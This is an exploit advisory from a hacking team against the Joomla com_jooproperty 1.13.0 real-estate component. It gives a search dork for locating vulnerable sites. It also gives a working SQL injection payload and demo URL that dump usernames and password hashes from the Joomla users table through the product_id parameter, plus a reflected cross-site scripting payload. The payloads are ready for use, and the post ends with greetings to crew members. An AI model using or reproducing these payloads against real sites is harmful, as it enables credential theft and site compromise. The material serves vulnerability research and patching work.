|   1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84  |   1 #########################################1  0 I'm D4NB4R member from Inj3ct0r Team 1 1 #########################################0  0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  #Exploit Title: Joomla com_jooproperty SQL injection && Cross site scripting Vulnerability  Dork: inurl:com_jooproperty  Date: [10-12-2012]  Author: Daniel Barragan "D4NB4R"  Twitter: @D4NB4R  Vendor: http://www.jooproperty.com/  Version: 1.13.0  Date Added:12 November 2012  License: GPLv2 or later Commercial]  Compatibility: Joomla! 2.5 Series  Information: http://extensions.joomla.org/extensions/vertical-markets/real-estate/22500  Tested on: [Linux(Arch)-Windows(7ultimate)]  Descripcion:  JooProperty is a real estate component developed for Joomla 1.7 and 2.5 with complex integrated booking features,  price calculation for different seasons and comment and rating functions. The component is based on com-property for Joomla 1.5 of Fabio Ueltzinger and offers the possibility to import  the database of com-property V3 and V4 to migrate your realty website to Joomla 2.5. All property relevant information like categories, locations, description, extras/amenities, season, price  categories, prices and special fees can be translated.  Vulnerable Parameter Name:  product_id  Parameter Type:  Querystring  Method:  Get  Attack Pattern Sql:  -{Valid id}%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+D4NB4R   Attack Pattern Xss:  ?layout=modal&option=com_jooproperty&product_id=" onmouseover%3dprompt() bad%3d"&view=booking  Exploit Demo:  SQLi : SQL injection  http://localhost/?option=com_jooproperty&view=booking&layout=modal&product_id=1%20and%201=0%20union%20select%201,(select group_concat(username,0x3D,password)%20from%20dy978_users)+--+D4NB4R   xss : Cross site scripting  http://localhost/?layout=modal&option=com_jooproperty&product_id=%22%20onmouseover%3dprompt%28%29%20bad%3d%22&view=booking Greetz:All Member Inj3ct0rTeam * m1nds group (www.m1nds.com)* pilot * aku * navi_terrible * dedalo * ksha * shine * devboot * r0073r * indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 Jago-dz * Kha&miX * T0xic * Ev!LsCr!pT_Dz * By Over-X *Saoucha * Cyber Sec * theblind74 * onurozkan * n2n * Meher Assel * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te _____________________________________________________ Daniel Barragan "D4NB4R" 2012  |